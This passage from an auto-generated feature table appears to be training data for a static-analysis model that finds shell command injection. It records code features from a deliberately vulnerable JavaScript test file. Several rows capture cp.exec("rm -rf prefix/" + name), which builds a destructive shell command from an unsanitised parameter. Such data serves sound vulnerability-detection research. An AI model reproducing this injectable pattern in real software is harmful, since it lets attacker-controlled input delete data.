name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | receiverName | fs | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:33:260:36 | name | stringConcatenatedWith | 'prefix/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:4 | cp | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:4 | cp | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:9 | cp.exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:6:261:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:6:261:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:6:261:9 | exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:6:261:9 | exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:6:261:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:26 | "rm -rf prefix/" | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:11:261:33 | "rm -rf ... + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:30:261:33 | name | stringConcatenatedWith | 'rm -rf prefix/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:3 | cp | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:3 | cp | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:8 | cp.exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:5:264:8 | exec | contextFunctionInterfaces | 